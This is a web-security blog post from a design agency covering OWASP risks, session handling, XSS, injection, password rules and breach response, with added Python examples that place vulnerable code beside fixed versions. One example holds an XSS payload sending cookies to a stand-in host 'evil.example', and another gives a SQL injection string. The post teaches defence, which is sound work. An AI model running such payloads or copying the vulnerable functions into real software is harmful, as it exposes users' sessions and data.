What You Need to Know About Website Security
What’s the impact?
Most recent news coverage has focused on physicians and the use of Electronic Health Records (EHRs). Lost laptops and insecure software have had devastating effects: patients are left exposed to attacks that exploit their personal information and health status. In response to these concerns, new guidance has been issued under HIPAA that steps up web security requirements. Healthcare programs are required to have a full security plan in place, including consistent monitoring of that plan against current threats.
How can I stay safe?
In 2001 the Open Web Application Security Project (OWASP) was founded. It is a non-profit organization made up of corporations, small businesses, and individual contributors, focused on improving web application security. In 2003, OWASP released its first Top 10 list of the most prevalent security risks in application development, together with programming standards that can be used to address them. The most recent 2013 version can be found here.
According to OWASP, security is approached in the following 3 steps:
1. Identify risks and assess their likelihood and impact on your business
2. Follow programming best practices to minimize or eliminate vulnerabilities
3. Continuously scan and monitor the application and its framework to ensure they remain secure
What are the dangers?
Authentication and session management. Security configurations, authentication, session handling, and access controls can all be implemented incorrectly. These are the mechanisms a website uses to confirm that a user is who they claim to be, and then to keep that user's session tied to them from one request to the next. Oversights let attackers obtain passwords, keys, and session tokens. Password rules help, but only as part of the whole picture: session tokens must be unpredictable, sent only over HTTPS, kept out of reach of scripts, expired after a reasonable time, and invalidated on logout.
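As an added example (not code from the original post), the following Python shows a minimal server-side session store that follows those rules: tokens come from the operating system's random generator rather than from anything guessable, lookups use a constant-time comparison, sessions expire and can be destroyed on logout, and the cookie that carries the token is marked HttpOnly, Secure and SameSite. The store, the 30-minute lifetime and the cookie name are choices made for this example.

```python
import hmac
import secrets
import time

SESSION_TTL = 30 * 60  # seconds; lifetime chosen for this example


class SessionStore:
    """In-memory session table (single process; a real deployment would use a
    shared store). The clock is injectable so expiry can be tested."""

    def __init__(self, clock=time.time):
        self._sessions = {}  # token -> (user_id, expiry timestamp)
        self._clock = clock

    def create(self, user_id: str) -> str:
        # 32 bytes from the OS CSPRNG. Never derive a token from the user id,
        # the time, or a counter: those are guessable.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (user_id, self._clock() + SESSION_TTL)
        return token

    def user_for(self, token: str):
        """Return the user id for a valid token, or None if it is unknown or expired."""
        for stored, (user_id, expires) in self._sessions.items():
            # Constant-time comparison so response timing does not leak how
            # many leading characters of a guessed token were correct.
            if hmac.compare_digest(stored, token):
                if self._clock() > expires:
                    del self._sessions[stored]  # safe: we return immediately
                    return None
                return user_id
        return None

    def destroy(self, token: str) -> None:
        """Logout: the token must stop working server-side, not just be
        forgotten by the browser."""
        self._sessions.pop(token, None)


def session_cookie(token: str) -> str:
    """Set-Cookie value for the token. HttpOnly keeps it away from page
    scripts (so an XSS bug cannot simply read it), Secure keeps it off plain
    HTTP, SameSite=Lax stops most cross-site requests from carrying it."""
    return (f"session={token}; Path=/; HttpOnly; Secure; SameSite=Lax; "
            f"Max-Age={SESSION_TTL}")
```

The same token should never appear in a URL or in a log line; the cookie attributes above only protect it in transit and in the browser, not once it has been written somewhere readable.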
Data validation and output encoding. A cross-site scripting (XSS) flaw occurs when an application takes untrusted data and sends it to a web browser without properly validating or escaping it. For example, if a registration site displays each attendee's name on a public list without escaping it, an attendee who enters a script tag as their name gets that script executed in the browser of everyone who views the list. The script runs with the victim's logged-in session, so it can steal the session cookie, hijack the session, or redirect the victim's requests to malicious sources.
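As an added example (not code from the original post), the following Python shows the flaw and the fix on a registration site's attendee list: a display name rendered by string concatenation versus the same name escaped for the context it lands in. The attacker's input, the page fragments and the host name in it are constructed for the demonstration.

```python
import html
from urllib.parse import quote

# Constructed attacker input: a "display name" that is really a script which
# ships the viewer's cookie to a server the attacker controls (hypothetical host).
ATTACKER_NAME = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'


def render_attendee_vulnerable(display_name: str) -> str:
    """Builds the attendee list entry by string concatenation. Untrusted input
    lands in the page unchanged, so the script above runs in the browser of
    everyone who views the list (stored XSS)."""
    return f"<li>{display_name}</li>"


def render_attendee_safe(display_name: str) -> str:
    """Same entry, with the untrusted value escaped for the HTML element-body
    context. quote=True also escapes quotes, so the result is safe inside
    attribute values too."""
    return f"<li>{html.escape(display_name, quote=True)}</li>"


def render_profile_link_safe(display_name: str, attendee_id: str) -> str:
    """Encoding is context-specific: a value inside a URL is percent-encoded,
    while the same value inside the element body is HTML-escaped. Using the
    wrong encoder for a context is itself an XSS bug."""
    return (f'<a href="/attendee?id={quote(attendee_id, safe="")}">'
            f'{html.escape(display_name, quote=True)}</a>')


def contains_live_script(rendered: str) -> bool:
    """Demo check: does a raw <script tag survive in the output? A real test
    would parse the DOM; this is enough to show the difference."""
    return "<script" in rendered.lower()
```

Validating input on the way in (length, character set) is worthwhile, but it does not replace escaping on the way out: a legitimate name such as O'Brien or a company called "A&B <Events>" must still be displayed correctly and safely.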
Flawed code. Ensure that any command the website constructs to exchange information with a database or external system is built safely. Examples include SQL (Structured Query Language) queries that the site runs against its data sources; OS (operating system) commands that the server executes; and LDAP (directory) queries used for authentication and single sign-on. An injection flaw occurs when untrusted input is pasted into such a command as text, so that part of what the attacker typed is interpreted as the command itself rather than as data.
An advanced website like a meeting registration website may rely on many of these potentially vulnerable functions to operate. SQL commands look up, update and change attendee lists and program schedules. OS command injection becomes possible when the platform runs a system command, for example to generate a calendar file or send scheduling email, using a value the user supplied. Websites like this need layered defences, because no single control is foolproof.
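As an added example (not code from the original post), the following Python shows both injection classes on the registration site described above: an attendee lookup built by string concatenation beside its parameterized form, and a calendar-export command passed through a shell beside one that runs the program directly with an allow-listed argument. The in-memory attendee table is constructed sample data, and the export tool is stood in for by echo so the example runs anywhere.

```python
import re
import sqlite3
import subprocess


def build_attendee_db() -> sqlite3.Connection:
    """Constructed in-memory attendee table standing in for the registration
    database (sample rows, not data from the original post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE attendees (id INTEGER PRIMARY KEY, email TEXT, name TEXT)")
    conn.executemany(
        "INSERT INTO attendees (email, name) VALUES (?, ?)",
        [("alice@example.org", "Alice"), ("bob@example.org", "Bob")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    """The email is pasted into the SQL text, so whatever the user typed is
    interpreted as part of the query. The input  ' OR '1'='1  turns a lookup
    of one attendee into a dump of the whole list."""
    sql = f"SELECT name FROM attendees WHERE email = '{email}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, email: str) -> list:
    """Parameterized query: the value travels separately from the statement
    and is only ever treated as data, never as SQL."""
    rows = conn.execute("SELECT name FROM attendees WHERE email = ?", (email,))
    return [row[0] for row in rows]


def export_vulnerable(filename: str) -> str:
    """Builds a shell command line by concatenation and hands it to a shell
    (the real export tool is replaced by echo for the demo). A filename
    containing ';' appends a second command of the attacker's choice."""
    cmd = f"echo exporting {filename}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True, check=True).stdout


# Must start with an alphanumeric (so '..' and hidden files are rejected);
# no slashes, spaces or shell metacharacters allowed. Limits chosen for the demo.
SAFE_FILENAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def export_safe(filename: str) -> str:
    """Allow-list the input, then run the program directly with an argument
    list: no shell is involved, so shell metacharacters have no meaning."""
    if not SAFE_FILENAME.fullmatch(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    return subprocess.run(["echo", "exporting", filename],
                          capture_output=True, text=True, check=True).stdout
```

The parameterized query is the fix for SQL injection; the argument list (and avoiding a shell at all) is the fix for OS command injection. The allow-list on the filename is defence in depth on top of that, not a substitute for it.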
Web security encompasses every component of a web experience. Servers, networks, hardware and software all need to be locked down. Cloud computing and “Bring Your Own Device” have complicated the issue. You now need to be monitoring your users’ systems as well as your own. The checklist can go on and on. The best place to start is with the framework of your website. Here are a few things to keep in mind.
Passwords
Weak passwords include those made up of all numbers or all letters. Re-using a password across multiple programs or websites also weakens security, as does storing passwords somewhere easily accessible. A strong password is at least eight characters long (longer is better). It shouldn't contain the user's username or company name. Avoid complete dictionary words, and make each new password significantly different from previous ones. Enforce these rules at the point where the password is set, and force a change whenever a compromise is suspected; forced periodic changes are only useful if the rules are enforced, otherwise users cycle through trivially related passwords. Personal security questions are not a substitute for these rules, since their answers are often guessable or public.
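As an added example (not code from the original post), the following Python encodes the password rules above as a checker that reports every rule a candidate breaks, and pairs it with the other half of password security the rules imply: the server must store only a salted, slow hash of the password, never the password itself. The small word list is a constructed stand-in for a real dictionary or breached-password list, and the 0.8 similarity threshold and PBKDF2 iteration count are this example's choices.

```python
import difflib
import hashlib
import hmac
import os

# Constructed stand-in for a real dictionary / breached-password list.
COMMON_WORDS = {"password", "welcome", "summer", "letmein", "qwerty"}


def password_problems(candidate: str, username: str, company: str,
                      previous: tuple = ()) -> list:
    """Return the rules the candidate breaks; an empty list means accepted.
    The rules follow the text above; the similarity threshold is this
    example's choice."""
    problems = []
    lower = candidate.lower()
    if len(candidate) < 8:
        problems.append("shorter than 8 characters")
    if candidate.isdigit():
        problems.append("all numbers")
    if candidate.isalpha():
        problems.append("all letters")
    for label, value in (("username", username), ("company name", company)):
        if value and value.lower() in lower:
            problems.append(f"contains {label}")
    # "Password1!" is still the dictionary word "password": strip trailing
    # digits and symbols before checking the list.
    if lower.rstrip("0123456789!@#$%^&*") in COMMON_WORDS:
        problems.append("dictionary word")
    for old in previous:
        if difflib.SequenceMatcher(None, lower, old.lower()).ratio() > 0.8:
            problems.append("too similar to a previous password")
            break
    return problems


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Store a salted PBKDF2-HMAC-SHA256 hash, never the password. The random
    salt means two users with the same password get different hashes; the
    iteration count makes each guess expensive for an attacker who steals
    the table. Format: algorithm$iterations$salt$digest (hex)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, then compare in
    constant time so timing does not reveal how close a guess was."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    recomputed = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(recomputed, bytes.fromhex(digest_hex))
```

PBKDF2 is used here because it ships with the Python standard library; a dedicated password-hashing library (bcrypt, scrypt or Argon2) is the better choice where one is available.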
Software Updates and Patches
Developers don’t stop programming once a solution is installed for their client. Mobile technology makes this even more critical, because one program tends to rely on many others to operate, so when one of them pushes an update, everything that depends on it needs to be checked and updated too. As soon as an update becomes available, your developer should be reviewing the program and installing the patch. Once a fix is public, attackers can compare the old and new versions to find the flaw it closes, so an unapplied update becomes a known vulnerability…fast.
Scanning and Testing
Penetration testing and vulnerability scanning will keep you abreast of your website’s security. Penetration testing combines review of your code with simulated real-world attacks to identify vulnerabilities; it is a point-in-time exercise performed by people. Vulnerability scanning is automated and can run continuously against firewalls and websites to confirm that they remain correctly configured and patched. In both cases, you should be notified promptly when a vulnerability is detected, and a scanner's findings still need a person to confirm them and rank them by risk.
What to do Once You’ve Identified a Vulnerability
If you have detected a vulnerability, the first thing you should do, of course, is fix it. The next thing to determine is whether the vulnerability was actually exploited and what data was taken; preserve your logs before making changes, because they are the evidence that answers that question. From there, it depends on the level of the breach. If any personal information has been accessed, the best thing to do is to disclose it promptly. Target customers were infuriated to learn that the company had warning signs of its breach weeks before disclosing it. Roughly 40 million payment card records and the phone numbers, home and e-mail addresses of up to 70 million customers were stolen. Where personal information is involved, the more immediate the response, the better.
It is imperative to choose a web partner who has security at the top of their minds. Security is a complex but vital aspect of web development. Vulnerabilities can develop anywhere…anytime. Flawed code is more common than you think. The Apple flaw that was recently uncovered, widely known as the “goto fail” bug, exists because a developer accidentally duplicated a single line of code. That one line caused a signature check to be skipped, so connections that looked encrypted could be intercepted by an attacker on the network while private information was transferred. Web partners should have QA processes in place to review their code, and security checkpoints for their own internal systems. They should be swift and adept at detecting and fixing vulnerabilities to decrease the likelihood of an attack.
If you’d like to learn more about website security, please feel free to reach out to Creative MediaWorks at info@CreativeMediaWorks.com and ask to speak to our Multimedia Manager today.
Thank you for visiting our blog. We hope the information provided was useful to you. If you haven’t joined our newsletter list, sign up here.